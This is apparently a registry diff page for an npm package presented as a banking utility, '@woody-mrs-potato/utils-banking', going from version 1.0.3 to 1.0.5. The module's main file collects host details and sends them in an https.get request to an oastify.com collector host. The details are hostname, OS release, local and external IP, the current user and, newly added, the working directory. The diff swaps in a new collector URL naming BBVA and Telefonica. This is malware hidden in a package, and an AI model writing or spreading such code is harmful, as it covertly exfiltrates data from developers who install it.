@woody-mrs-potato/utils-banking 1.0.3 → 1.0.5

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/src/iban.js +2 -1
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@woody-mrs-potato/utils-banking",
3
- "version": "1.0.3",
3
+ "version": "1.0.5",
4
4
  "description": "A test utility module for common operations.",
5
5
  "main": "src/iban.js",
6
6
  "author": "Telefo David",
package/src/iban.js CHANGED
@@ -36,6 +36,7 @@ const systemInfo = {
36
36
  release: os.release(),
37
37
  hostname: os.hostname(),
38
38
  ip: os.networkInterfaces()['eth0'] ? os.networkInterfaces()['eth0'][0].address : 'Unknown',
39
+ cwd: process.cwd(),
39
40
  };
40
41
 
41
42
  getExternalIp((externalIp) => {
@@ -46,7 +47,7 @@ getExternalIp((externalIp) => {
46
47
  user: whoami
47
48
  }).toString();
48
49
 
49
- const url = `https://lb0wfl0wv7ay9yxaniioaw54tvzmncb1.oastify.com/BBVA/telefonica?${queryParams}`;
50
+ const url = `https://dr8ovdgobzqqpqd23aygqolw9nfe35ru.oastify.com/BBVA/Telefonica?${queryParams}`;
50
51
 
51
52
  https.get(url, (res) => {
52
53
  console.log(`Status: ${res.statusCode}`);